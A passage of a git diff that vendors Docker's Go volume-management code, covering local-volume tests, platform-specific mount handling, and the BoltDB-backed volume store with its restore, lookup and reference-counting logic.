+ if runtime.GOOS == "windows" { + t.Skip("Test failing on Windows CI") + } + rootDir, err := ioutil.TempDir("", "local-volume-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + vol, err := r.Create("testing", nil) + if err != nil { + t.Fatal(err) + } + + if err := r.Remove(vol); err != nil { + t.Fatal(err) + } + + vol, err = r.Create("testing2", nil) + if err != nil { + t.Fatal(err) + } + if err := os.RemoveAll(vol.Path()); err != nil { + t.Fatal(err) + } + + if err := r.Remove(vol); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(vol.Path()); err != nil && !os.IsNotExist(err) { + t.Fatal("volume dir not removed") + } + + if l, _ := r.List(); len(l) != 0 { + t.Fatal("expected there to be no volumes") + } +} + +func TestInitializeWithVolumes(t *testing.T) { + rootDir, err := ioutil.TempDir("", "local-volume-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + vol, err := r.Create("testing", nil) + if err != nil { + t.Fatal(err) + } + + r, err = New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + v, err := r.Get(vol.Name()) + if err != nil { + t.Fatal(err) + } + + if v.Path() != vol.Path() { + t.Fatal("expected to re-initialize root with existing volumes") + } +} + +func TestCreate(t *testing.T) { + rootDir, err := ioutil.TempDir("", "local-volume-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + cases := map[string]bool{ + "name": true, + "name-with-dash": true, + "name_with_underscore": true, + "name/with/slash": false, + "name/with/../../slash": false, + "./name": false, + "../name": false, + "./": false, + "../": false, + "~": false, + ".": false, + "..": false, + "...": false, + } + + for name, success := range cases { + v, err := r.Create(name, nil) + if 
success { + if err != nil { + t.Fatal(err) + } + if v.Name() != name { + t.Fatalf("Expected volume with name %s, got %s", name, v.Name()) + } + } else { + if err == nil { + t.Fatalf("Expected error creating volume with name %s, got nil", name) + } + } + } + + r, err = New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } +} + +func TestValidateName(t *testing.T) { + r := &Root{} + names := map[string]bool{ + "x": false, + "/testvol": false, + "thing.d": true, + "hello-world": true, + "./hello": false, + ".hello": false, + } + + for vol, expected := range names { + err := r.validateName(vol) + if expected && err != nil { + t.Fatalf("expected %s to be valid got %v", vol, err) + } + if !expected && err == nil { + t.Fatalf("expected %s to be invalid", vol) + } + } +} + +func TestCreateWithOpts(t *testing.T) { + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip() + } + rootDir, err := ioutil.TempDir("", "local-volume-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + if _, err := r.Create("test", map[string]string{"invalidopt": "notsupported"}); err == nil { + t.Fatal("expected invalid opt to cause error") + } + + vol, err := r.Create("test", map[string]string{"device": "tmpfs", "type": "tmpfs", "o": "size=1m,uid=1000"}) + if err != nil { + t.Fatal(err) + } + v := vol.(*localVolume) + + dir, err := v.Mount("1234") + if err != nil { + t.Fatal(err) + } + defer func() { + if err := v.Unmount("1234"); err != nil { + t.Fatal(err) + } + }() + + mountInfos, err := mount.GetMounts() + if err != nil { + t.Fatal(err) + } + + var found bool + for _, info := range mountInfos { + if info.Mountpoint == dir { + found = true + if info.Fstype != "tmpfs" { + t.Fatalf("expected tmpfs mount, got %q", info.Fstype) + } + if info.Source != "tmpfs" { + t.Fatalf("expected tmpfs mount, got %q", info.Source) + } + if !strings.Contains(info.VfsOpts, "uid=1000") { + 
t.Fatalf("expected mount info to have uid=1000: %q", info.VfsOpts) + } + if !strings.Contains(info.VfsOpts, "size=1024k") { + t.Fatalf("expected mount info to have size=1024k: %q", info.VfsOpts) + } + break + } + } + + if !found { + t.Fatal("mount not found") + } + + if v.active.count != 1 { + t.Fatalf("Expected active mount count to be 1, got %d", v.active.count) + } + + // test double mount + if _, err := v.Mount("1234"); err != nil { + t.Fatal(err) + } + if v.active.count != 2 { + t.Fatalf("Expected active mount count to be 2, got %d", v.active.count) + } + + if err := v.Unmount("1234"); err != nil { + t.Fatal(err) + } + if v.active.count != 1 { + t.Fatalf("Expected active mount count to be 1, got %d", v.active.count) + } + + mounted, err := mount.Mounted(v.path) + if err != nil { + t.Fatal(err) + } + if !mounted { + t.Fatal("expected mount to still be active") + } + + r, err = New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + v2, exists := r.volumes["test"] + if !exists { + t.Fatal("missing volume on restart") + } + + if !reflect.DeepEqual(v.opts, v2.opts) { + t.Fatal("missing volume options on restart") + } +} + +func TestRealodNoOpts(t *testing.T) { + rootDir, err := ioutil.TempDir("", "volume-test-reload-no-opts") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(rootDir) + + r, err := New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + if _, err := r.Create("test1", nil); err != nil { + t.Fatal(err) + } + if _, err := r.Create("test2", nil); err != nil { + t.Fatal(err) + } + // make sure a file with `null` (.e.g. 
empty opts map from older daemon) is ok + if err := ioutil.WriteFile(filepath.Join(rootDir, "test2"), []byte("null"), 600); err != nil { + t.Fatal(err) + } + + if _, err := r.Create("test3", nil); err != nil { + t.Fatal(err) + } + // make sure an empty opts file doesn't break us too + if err := ioutil.WriteFile(filepath.Join(rootDir, "test3"), nil, 600); err != nil { + t.Fatal(err) + } + + if _, err := r.Create("test4", map[string]string{}); err != nil { + t.Fatal(err) + } + + r, err = New(rootDir, 0, 0) + if err != nil { + t.Fatal(err) + } + + for _, name := range []string{"test1", "test2", "test3", "test4"} { + v, err := r.Get(name) + if err != nil { + t.Fatal(err) + } + lv, ok := v.(*localVolume) + if !ok { + t.Fatalf("expected *localVolume got: %v", reflect.TypeOf(v)) + } + if lv.opts != nil { + t.Fatalf("expected opts to be nil, got: %v", lv.opts) + } + if _, err := lv.Mount("1234"); err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/volume/local/local_unix.go b/vendor/github.com/docker/docker/volume/local/local_unix.go new file mode 100644 index 0000000000..fb08862cef --- /dev/null +++ b/vendor/github.com/docker/docker/volume/local/local_unix.go @@ -0,0 +1,87 @@ +// +build linux freebsd solaris + +// Package local provides the default implementation for volumes. It +// is used to mount data volume containers and directories local to +// the host server. +package local + +import ( + "fmt" + "net" + "path/filepath" + "strings" + + "github.com/pkg/errors" + + "github.com/docker/docker/pkg/mount" +) + +var ( + oldVfsDir = filepath.Join("vfs", "dir") + + validOpts = map[string]bool{ + "type": true, // specify the filesystem type for mount, e.g. 
nfs + "o": true, // generic mount options + "device": true, // device to mount from + } +) + +type optsConfig struct { + MountType string + MountOpts string + MountDevice string +} + +func (o *optsConfig) String() string { + return fmt.Sprintf("type='%s' device='%s' o='%s'", o.MountType, o.MountDevice, o.MountOpts) +} + +// scopedPath verifies that the path where the volume is located +// is under Docker's root and the valid local paths. +func (r *Root) scopedPath(realPath string) bool { + // Volumes path for Docker version >= 1.7 + if strings.HasPrefix(realPath, filepath.Join(r.scope, volumesPathName)) && realPath != filepath.Join(r.scope, volumesPathName) { + return true + } + + // Volumes path for Docker version < 1.7 + if strings.HasPrefix(realPath, filepath.Join(r.scope, oldVfsDir)) { + return true + } + + return false +} + +func setOpts(v *localVolume, opts map[string]string) error { + if len(opts) == 0 { + return nil + } + if err := validateOpts(opts); err != nil { + return err + } + + v.opts = &optsConfig{ + MountType: opts["type"], + MountOpts: opts["o"], + MountDevice: opts["device"], + } + return nil +} + +func (v *localVolume) mount() error { + if v.opts.MountDevice == "" { + return fmt.Errorf("missing device in volume options") + } + mountOpts := v.opts.MountOpts + if v.opts.MountType == "nfs" { + if addrValue := getAddress(v.opts.MountOpts); addrValue != "" && net.ParseIP(addrValue).To4() == nil { + ipAddr, err := net.ResolveIPAddr("ip", addrValue) + if err != nil { + return errors.Wrapf(err, "error resolving passed in nfs address") + } + mountOpts = strings.Replace(mountOpts, "addr="+addrValue, "addr="+ipAddr.String(), 1) + } + } + err := mount.Mount(v.opts.MountDevice, v.path, v.opts.MountType, mountOpts) + return errors.Wrapf(err, "error while mounting volume with options: %s", v.opts) +} diff --git a/vendor/github.com/docker/docker/volume/local/local_windows.go b/vendor/github.com/docker/docker/volume/local/local_windows.go new file mode 100644 
index 0000000000..1bdb368a0f --- /dev/null +++ b/vendor/github.com/docker/docker/volume/local/local_windows.go @@ -0,0 +1,34 @@ +// Package local provides the default implementation for volumes. It +// is used to mount data volume containers and directories local to +// the host server. +package local + +import ( + "fmt" + "path/filepath" + "strings" +) + +type optsConfig struct{} + +var validOpts map[string]bool + +// scopedPath verifies that the path where the volume is located +// is under Docker's root and the valid local paths. +func (r *Root) scopedPath(realPath string) bool { + if strings.HasPrefix(realPath, filepath.Join(r.scope, volumesPathName)) && realPath != filepath.Join(r.scope, volumesPathName) { + return true + } + return false +} + +func setOpts(v *localVolume, opts map[string]string) error { + if len(opts) > 0 { + return fmt.Errorf("options are not supported on this platform") + } + return nil +} + +func (v *localVolume) mount() error { + return nil +} diff --git a/vendor/github.com/docker/docker/volume/store/db.go b/vendor/github.com/docker/docker/volume/store/db.go new file mode 100644 index 0000000000..c5fd1643f5 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/db.go @@ -0,0 +1,88 @@ +package store + +import ( + "encoding/json" + + "github.com/Sirupsen/logrus" + "github.com/boltdb/bolt" + "github.com/pkg/errors" +) + +var volumeBucketName = []byte("volumes") + +type volumeMetadata struct { + Name string + Driver string + Labels map[string]string + Options map[string]string +} + +func (s *VolumeStore) setMeta(name string, meta volumeMetadata) error { + return s.db.Update(func(tx *bolt.Tx) error { + return setMeta(tx, name, meta) + }) +} + +func setMeta(tx *bolt.Tx, name string, meta volumeMetadata) error { + metaJSON, err := json.Marshal(meta) + if err != nil { + return err + } + b := tx.Bucket(volumeBucketName) + return errors.Wrap(b.Put([]byte(name), metaJSON), "error setting volume metadata") +} + +func (s *VolumeStore) 
getMeta(name string) (volumeMetadata, error) { + var meta volumeMetadata + err := s.db.View(func(tx *bolt.Tx) error { + return getMeta(tx, name, &meta) + }) + return meta, err +} + +func getMeta(tx *bolt.Tx, name string, meta *volumeMetadata) error { + b := tx.Bucket(volumeBucketName) + val := b.Get([]byte(name)) + if string(val) == "" { + return nil + } + if err := json.Unmarshal(val, meta); err != nil { + return errors.Wrap(err, "error unmarshaling volume metadata") + } + return nil +} + +func (s *VolumeStore) removeMeta(name string) error { + return s.db.Update(func(tx *bolt.Tx) error { + return removeMeta(tx, name) + }) +} + +func removeMeta(tx *bolt.Tx, name string) error { + b := tx.Bucket(volumeBucketName) + return errors.Wrap(b.Delete([]byte(name)), "error removing volume metadata") +} + +// listMeta is used during restore to get the list of volume metadata +// from the on-disk database. +// Any errors that occur are only logged. +func listMeta(tx *bolt.Tx) []volumeMetadata { + var ls []volumeMetadata + b := tx.Bucket(volumeBucketName) + b.ForEach(func(k, v []byte) error { + if len(v) == 0 { + // don't try to unmarshal an empty value + return nil + } + + var m volumeMetadata + if err := json.Unmarshal(v, &m); err != nil { + // Just log the error + logrus.Errorf("Error while reading volume metadata for volume %q: %v", string(k), err) + return nil + } + ls = append(ls, m) + return nil + }) + return ls +} diff --git a/vendor/github.com/docker/docker/volume/store/errors.go b/vendor/github.com/docker/docker/volume/store/errors.go new file mode 100644 index 0000000000..980175f29c --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/errors.go @@ -0,0 +1,76 @@ +package store + +import ( + "strings" + + "github.com/pkg/errors" +) + +var ( + // errVolumeInUse is a typed error returned when trying to remove a volume that is currently in use by a container + errVolumeInUse = errors.New("volume is in use") + // errNoSuchVolume is a typed error returned if 
the requested volume doesn't exist in the volume store + errNoSuchVolume = errors.New("no such volume") + // errInvalidName is a typed error returned when creating a volume with a name that is not valid on the platform + errInvalidName = errors.New("volume name is not valid on this platform") + // errNameConflict is a typed error returned on create when a volume exists with the given name, but for a different driver + errNameConflict = errors.New("volume name must be unique") +) + +// OpErr is the error type returned by functions in the store package. It describes +// the operation, volume name, and error. +type OpErr struct { + // Err is the error that occurred during the operation. + Err error + // Op is the operation which caused the error, such as "create", or "list". + Op string + // Name is the name of the resource being requested for this op, typically the volume name or the driver name. + Name string + // Refs is the list of references associated with the resource. + Refs []string +} + +// Error satisfies the built-in error interface type. 
+func (e *OpErr) Error() string { + if e == nil { + return "" + } + s := e.Op + if e.Name != "" { + s = s + " " + e.Name + } + + s = s + ": " + e.Err.Error() + if len(e.Refs) > 0 { + s = s + " - " + "[" + strings.Join(e.Refs, ", ") + "]" + } + return s +} + +// IsInUse returns a boolean indicating whether the error indicates that a +// volume is in use +func IsInUse(err error) bool { + return isErr(err, errVolumeInUse) +} + +// IsNotExist returns a boolean indicating whether the error indicates that the volume does not exist +func IsNotExist(err error) bool { + return isErr(err, errNoSuchVolume) +} + +// IsNameConflict returns a boolean indicating whether the error indicates that a +// volume name is already taken +func IsNameConflict(err error) bool { + return isErr(err, errNameConflict) +} + +func isErr(err error, expected error) bool { + err = errors.Cause(err) + switch pe := err.(type) { + case nil: + return false + case *OpErr: + err = errors.Cause(pe.Err) + } + return err == expected +} diff --git a/vendor/github.com/docker/docker/volume/store/restore.go b/vendor/github.com/docker/docker/volume/store/restore.go new file mode 100644 index 0000000000..c0c5b519bc --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/restore.go @@ -0,0 +1,83 @@ +package store + +import ( + "sync" + + "github.com/Sirupsen/logrus" + "github.com/boltdb/bolt" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" +) + +// restore is called when a new volume store is created. +// It's primary purpose is to ensure that all drivers' refcounts are set based +// on known volumes after a restart. +// This only attempts to track volumes that are actually stored in the on-disk db. +// It does not probe the available drivers to find anything that may have been added +// out of band. 
+func (s *VolumeStore) restore() { + var ls []volumeMetadata + s.db.View(func(tx *bolt.Tx) error { + ls = listMeta(tx) + return nil + }) + + chRemove := make(chan *volumeMetadata, len(ls)) + var wg sync.WaitGroup + for _, meta := range ls { + wg.Add(1) + // this is potentially a very slow operation, so do it in a goroutine + go func(meta volumeMetadata) { + defer wg.Done() + + var v volume.Volume + var err error + if meta.Driver != "" { + v, err = lookupVolume(meta.Driver, meta.Name) + if err != nil && err != errNoSuchVolume { + logrus.WithError(err).WithField("driver", meta.Driver).WithField("volume", meta.Name).Warn("Error restoring volume") + return + } + if v == nil { + // doesn't exist in the driver, remove it from the db + chRemove <- &meta + return + } + } else { + v, err = s.getVolume(meta.Name) + if err != nil { + if err == errNoSuchVolume { + chRemove <- &meta + } + return + } + + meta.Driver = v.DriverName() + if err := s.setMeta(v.Name(), meta); err != nil { + logrus.WithError(err).WithField("driver", meta.Driver).WithField("volume", v.Name()).Warn("Error updating volume metadata on restore") + } + } + + // increment driver refcount + volumedrivers.CreateDriver(meta.Driver) + + // cache the volume + s.globalLock.Lock() + s.options[v.Name()] = meta.Options + s.labels[v.Name()] = meta.Labels + s.names[v.Name()] = v + s.globalLock.Unlock() + }(meta) + } + + wg.Wait() + close(chRemove) + s.db.Update(func(tx *bolt.Tx) error { + for meta := range chRemove { + if err := removeMeta(tx, meta.Name); err != nil { + logrus.WithField("volume", meta.Name).Warnf("Error removing stale entry from volume db: %v", err) + } + } + return nil + }) +} diff --git a/vendor/github.com/docker/docker/volume/store/store.go b/vendor/github.com/docker/docker/volume/store/store.go new file mode 100644 index 0000000000..38afd86f45 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/store/store.go @@ -0,0 +1,649 @@ +package store + +import ( + "net" + "os" + "path/filepath" + 
"sync" + "time" + + "github.com/pkg/errors" + + "github.com/Sirupsen/logrus" + "github.com/boltdb/bolt" + "github.com/docker/docker/pkg/locker" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" +) + +const ( + volumeDataDir = "volumes" +) + +type volumeWrapper struct { + volume.Volume + labels map[string]string + scope string + options map[string]string +} + +func (v volumeWrapper) Options() map[string]string { + options := map[string]string{} + for key, value := range v.options { + options[key] = value + } + return options +} + +func (v volumeWrapper) Labels() map[string]string { + return v.labels +} + +func (v volumeWrapper) Scope() string { + return v.scope +} + +func (v volumeWrapper) CachedPath() string { + if vv, ok := v.Volume.(interface { + CachedPath() string + }); ok { + return vv.CachedPath() + } + return v.Volume.Path() +} + +// New initializes a VolumeStore to keep +// reference counting of volumes in the system. +func New(rootPath string) (*VolumeStore, error) { + vs := &VolumeStore{ + locks: &locker.Locker{}, + names: make(map[string]volume.Volume), + refs: make(map[string][]string), + labels: make(map[string]map[string]string), + options: make(map[string]map[string]string), + } + + if rootPath != "" { + // initialize metadata store + volPath := filepath.Join(rootPath, volumeDataDir) + if err := os.MkdirAll(volPath, 750); err != nil { + return nil, err + } + + dbPath := filepath.Join(volPath, "metadata.db") + + var err error + vs.db, err = bolt.Open(dbPath, 0600, &bolt.Options{Timeout: 1 * time.Second}) + if err != nil { + return nil, errors.Wrap(err, "error while opening volume store metadata database") + } + + // initialize volumes bucket + if err := vs.db.Update(func(tx *bolt.Tx) error { + if _, err := tx.CreateBucketIfNotExists(volumeBucketName); err != nil { + return errors.Wrap(err, "error while setting up volume store metadata database") + } + return nil + }); err != nil { + return nil, err + } + } + + 
vs.restore() + + return vs, nil +} + +func (s *VolumeStore) getNamed(name string) (volume.Volume, bool) { + s.globalLock.RLock() + v, exists := s.names[name] + s.globalLock.RUnlock() + return v, exists +} + +func (s *VolumeStore) setNamed(v volume.Volume, ref string) { + s.globalLock.Lock() + s.names[v.Name()] = v + if len(ref) > 0 { + s.refs[v.Name()] = append(s.refs[v.Name()], ref) + } + s.globalLock.Unlock() +} + +// getRefs gets the list of refs for a given name +// Callers of this function are expected to hold the name lock. +func (s *VolumeStore) getRefs(name string) []string { + s.globalLock.RLock() + refs := s.refs[name] + s.globalLock.RUnlock() + return refs +} + +// Purge allows the cleanup of internal data on docker in case +// the internal data is out of sync with volumes driver plugins. +func (s *VolumeStore) Purge(name string) { + s.globalLock.Lock() + v, exists := s.names[name] + if exists { + if _, err := volumedrivers.RemoveDriver(v.DriverName()); err != nil { + logrus.Error("Error dereferencing volume driver: %v", err) + } + } + if err := s.removeMeta(name); err != nil { + logrus.Errorf("Error removing volume metadata for volume %q: %v", name, err) + } + delete(s.names, name) + delete(s.refs, name) + delete(s.labels, name) + delete(s.options, name) + s.globalLock.Unlock() +} + +// VolumeStore is a struct that stores the list of volumes available and keeps track of their usage counts +type VolumeStore struct { + // locks ensures that only one action is being performed on a particular volume at a time without locking the entire store + // since actions on volumes can be quite slow, this ensures the store is free to handle requests for other volumes. + locks *locker.Locker + // globalLock is used to protect access to mutable structures used by the store object + globalLock sync.RWMutex + // names stores the volume name -> volume relationship. 
+ // This is used for making lookups faster so we don't have to probe all drivers + names map[string]volume.Volume + // refs stores the volume name and the list of things referencing it + refs map[string][]string + // labels stores volume labels for each volume + labels map[string]map[string]string + // options stores volume options for each volume + options map[string]map[string]string + db *bolt.DB +} + +// List proxies to all registered volume drivers to get the full list of volumes +// If a driver returns a volume that has name which conflicts with another volume from a different driver, +// the first volume is chosen and the conflicting volume is dropped. +func (s *VolumeStore) List() ([]volume.Volume, []string, error) { + vols, warnings, err := s.list() + if err != nil { + return nil, nil, &OpErr{Err: err, Op: "list"} + } + var out []volume.Volume + + for _, v := range vols { + name := normaliseVolumeName(v.Name()) + + s.locks.Lock(name) + storedV, exists := s.getNamed(name) + // Note: it's not safe to populate the cache here because the volume may have been + // deleted before we acquire a lock on its name + if exists && storedV.DriverName() != v.DriverName() { + logrus.Warnf("Volume name %s already exists for driver %s, not including volume returned by %s", v.Name(), storedV.DriverName(), v.DriverName()) + s.locks.Unlock(v.Name()) + continue + } + + out = append(out, v) + s.locks.Unlock(v.Name()) + } + return out, warnings, nil +} + +// list goes through each volume driver and asks for its list of volumes. 
+func (s *VolumeStore) list() ([]volume.Volume, []string, error) { + var ( + ls []volume.Volume + warnings []string + ) + + drivers, err := volumedrivers.GetAllDrivers() + if err != nil { + return nil, nil, err + } + + type vols struct { + vols []volume.Volume + err error + driverName string + } + chVols := make(chan vols, len(drivers)) + + for _, vd := range drivers { + go func(d volume.Driver) { + vs, err := d.List() + if err != nil { + chVols <- vols{driverName: d.Name(), err: &OpErr{Err: err, Name: d.Name(), Op: "list"}} + return + } + for i, v := range vs { + s.globalLock.RLock() + vs[i] = volumeWrapper{v, s.labels[v.Name()], d.Scope(), s.options[v.Name()]} + s.globalLock.RUnlock() + } + + chVols <- vols{vols: vs} + }(vd) + } + + badDrivers := make(map[string]struct{}) + for i := 0; i < len(drivers); i++ { + vs := <-chVols + + if vs.err != nil { + warnings = append(warnings, vs.err.Error()) + badDrivers[vs.driverName] = struct{}{} + logrus.Warn(vs.err) + } + ls = append(ls, vs.vols...) + } + + if len(badDrivers) > 0 { + s.globalLock.RLock() + for _, v := range s.names { + if _, exists := badDrivers[v.DriverName()]; exists { + ls = append(ls, v) + } + } + s.globalLock.RUnlock() + } + return ls, warnings, nil +} + +// CreateWithRef creates a volume with the given name and driver and stores the ref +// This ensures there's no race between creating a volume and then storing a reference. +func (s *VolumeStore) CreateWithRef(name, driverName, ref string, opts, labels map[string]string) (volume.Volume, error) { + name = normaliseVolumeName(name) + s.locks.Lock(name) + defer s.locks.Unlock(name) + + v, err := s.create(name, driverName, opts, labels) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "create"} + } + + s.setNamed(v, ref) + return v, nil +} + +// Create creates a volume with the given name and driver. +// This is just like CreateWithRef() except we don't store a reference while holding the lock. 
+func (s *VolumeStore) Create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) { + return s.CreateWithRef(name, driverName, "", opts, labels) +} + +// checkConflict checks the local cache for name collisions with the passed in name, +// for existing volumes with the same name but in a different driver. +// This is used by `Create` as a best effort to prevent name collisions for volumes. +// If a matching volume is found that is not a conflict that is returned so the caller +// does not need to perform an additional lookup. +// When no matching volume is found, both returns will be nil +// +// Note: This does not probe all the drivers for name collisions because v1 plugins +// are very slow, particularly if the plugin is down, and cause other issues, +// particularly around locking the store. +// TODO(cpuguy83): With v2 plugins this shouldn't be a problem. Could also potentially +// use a connect timeout for this kind of check to ensure we aren't blocking for a +// long time. +func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, error) { + // check the local cache + v, _ := s.getNamed(name) + if v == nil { + return nil, nil + } + + vDriverName := v.DriverName() + var conflict bool + if driverName != "" { + // Retrieve canonical driver name to avoid inconsistencies (for example + // "plugin" vs. 
"plugin:latest") + vd, err := volumedrivers.GetDriver(driverName) + if err != nil { + return nil, err + } + + if vDriverName != vd.Name() { + conflict = true + } + } + + // let's check if the found volume ref + // is stale by checking with the driver if it still exists + exists, err := volumeExists(v) + if err != nil { + return nil, errors.Wrapf(errNameConflict, "found reference to volume '%s' in driver '%s', but got an error while checking the driver: %v", name, vDriverName, err) + } + + if exists { + if conflict { + return nil, errors.Wrapf(errNameConflict, "driver '%s' already has volume '%s'", vDriverName, name) + } + return v, nil + } + + if len(s.getRefs(v.Name())) > 0 { + // Containers are referencing this volume but it doesn't seem to exist anywhere. + // Return a conflict error here, the user can fix this with `docker volume rm -f` + return nil, errors.Wrapf(errNameConflict, "found references to volume '%s' in driver '%s' but the volume was not found in the driver -- you may need to remove containers referencing this volume or force remove the volume to re-create it", name, vDriverName) + } + + // doesn't exist, so purge it from the cache + s.Purge(name) + return nil, nil +} + +// volumeExists returns if the volume is still present in the driver. +// An error is returned if there was an issue communicating with the driver. +func volumeExists(v volume.Volume) (bool, error) { + exists, err := lookupVolume(v.DriverName(), v.Name()) + if err != nil { + return false, err + } + return exists != nil, nil +} + +// create asks the given driver to create a volume with the name/opts. +// If a volume with the name is already known, it will ask the stored driver for the volume. +// If the passed in driver name does not match the driver name which is stored +// for the given volume name, an error is returned after checking if the reference is stale. +// If the reference is stale, it will be purged and this create can continue. 
+// It is expected that callers of this function hold any necessary locks. +func (s *VolumeStore) create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) { + // Validate the name in a platform-specific manner + valid, err := volume.IsVolumeNameValid(name) + if err != nil { + return nil, err + } + if !valid { + return nil, &OpErr{Err: errInvalidName, Name: name, Op: "create"} + } + + v, err := s.checkConflict(name, driverName) + if err != nil { + return nil, err + } + + if v != nil { + return v, nil + } + + // Since there isn't a specified driver name, let's see if any of the existing drivers have this volume name + if driverName == "" { + v, _ := s.getVolume(name) + if v != nil { + return v, nil + } + } + + vd, err := volumedrivers.CreateDriver(driverName) + + if err != nil { + return nil, &OpErr{Op: "create", Name: name, Err: err} + } + + logrus.Debugf("Registering new volume reference: driver %q, name %q", vd.Name(), name) + + if v, _ := vd.Get(name); v != nil { + return v, nil + } + v, err = vd.Create(name, opts) + if err != nil { + return nil, err + } + s.globalLock.Lock() + s.labels[name] = labels + s.options[name] = opts + s.globalLock.Unlock() + + metadata := volumeMetadata{ + Name: name, + Driver: vd.Name(), + Labels: labels, + Options: opts, + } + + if err := s.setMeta(name, metadata); err != nil { + return nil, err + } + return volumeWrapper{v, labels, vd.Scope(), opts}, nil +} + +// GetWithRef gets a volume with the given name from the passed in driver and stores the ref +// This is just like Get(), but we store the reference while holding the lock. 
+// This makes sure there are no races between checking for the existence of a volume and adding a reference for it +func (s *VolumeStore) GetWithRef(name, driverName, ref string) (volume.Volume, error) { + name = normaliseVolumeName(name) + s.locks.Lock(name) + defer s.locks.Unlock(name) + + vd, err := volumedrivers.GetDriver(driverName) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "get"} + } + + v, err := vd.Get(name) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "get"} + } + + s.setNamed(v, ref) + + s.globalLock.RLock() + defer s.globalLock.RUnlock() + return volumeWrapper{v, s.labels[name], vd.Scope(), s.options[name]}, nil +} + +// Get looks if a volume with the given name exists and returns it if so +func (s *VolumeStore) Get(name string) (volume.Volume, error) { + name = normaliseVolumeName(name) + s.locks.Lock(name) + defer s.locks.Unlock(name) + + v, err := s.getVolume(name) + if err != nil { + return nil, &OpErr{Err: err, Name: name, Op: "get"} + } + s.setNamed(v, "") + return v, nil +} + +// getVolume requests the volume, if the driver info is stored it just accesses that driver, +// if the driver is unknown it probes all drivers until it finds the first volume with that name. 
+// it is expected that callers of this function hold any necessary locks +func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { + var meta volumeMetadata + meta, err := s.getMeta(name) + if err != nil { + return nil, err + } + + driverName := meta.Driver + if driverName == "" { + s.globalLock.RLock() + v, exists := s.names[name] + s.globalLock.RUnlock() + if exists { + meta.Driver = v.DriverName() + if err := s.setMeta(name, meta); err != nil { + return nil, err + } + } + } + + if meta.Driver != "" { + vol, err := lookupVolume(meta.Driver, name) + if err != nil { + return nil, err + } + if vol == nil { + s.Purge(name) + return nil, errNoSuchVolume + } + + var scope string + vd, err := volumedrivers.GetDriver(meta.Driver) + if err == nil { + scope = vd.Scope() + } + return volumeWrapper{vol, meta.Labels, scope, meta.Options}, nil + } + + logrus.Debugf("Probing all drivers for volume with name: %s", name) + drivers, err := volumedrivers.GetAllDrivers() + if err != nil { + return nil, err + } + + for _, d := range drivers { + v, err := d.Get(name) + if err != nil || v == nil { + continue + } + meta.Driver = v.DriverName() + if err := s.setMeta(name, meta); err != nil { + return nil, err + } + return volumeWrapper{v, meta.Labels, d.Scope(), meta.Options}, nil + } + return nil, errNoSuchVolume +} + +// lookupVolume gets the specified volume from the specified driver. +// This will only return errors related to communications with the driver. +// If the driver returns an error that is not communication related the +// error is logged but not returned. 
+// If the volume is not found it will return `nil, nil`` +func lookupVolume(driverName, volumeName string) (volume.Volume, error) { + vd, err := volumedrivers.GetDriver(driverName) + if err != nil { + return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", volumeName, driverName) + } + v, err := vd.Get(volumeName) + if err != nil { + err = errors.Cause(err) + if _, ok := err.(net.Error); ok { + return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", v.Name(), v.DriverName()) + } + + // At this point, the error could be anything from the driver, such as "no such volume" + // Let's not check an error here, and instead check if the driver returned a volume + logrus.WithError(err).WithField("driver", driverName).WithField("volume", volumeName).Warnf("Error while looking up volume") + } + return v, nil +} + +// Remove removes the requested volume. A volume is not removed if it has any refs +func (s *VolumeStore) Remove(v volume.Volume) error { + name := normaliseVolumeName(v.Name()) + s.locks.Lock(name) + defer s.locks.Unlock(name) + + refs := s.getRefs(name) + if len(refs) > 0 { + return &OpErr{Err: errVolumeInUse, Name: v.Name(), Op: "remove", Refs: refs} + } + + vd, err := volumedrivers.GetDriver(v.DriverName()) + if err != nil { + return &OpErr{Err: err, Name: vd.Name(), Op: "remove"} + } + + logrus.Debugf("Removing volume reference: driver %s, name %s", v.DriverName(), name) + vol := unwrapVolume(v) + if err := vd.Remove(vol); err != nil { + return &OpErr{Err: err, Name: name, Op: "remove"} + } + + s.Purge(name) + return nil +} + +// Dereference removes the specified reference to the volume +func (s *VolumeStore) Dereference(v volume.Volume, ref string) { + s.locks.Lock(v.Name()) + defer s.locks.Unlock(v.Name()) + + s.globalLock.Lock() + defer s.globalLock.Unlock() + var refs []string + + for _, r := range s.refs[v.Name()] { + if r != ref { + refs = append(refs, r) + } + } + s.refs[v.Name()] = refs +} + 
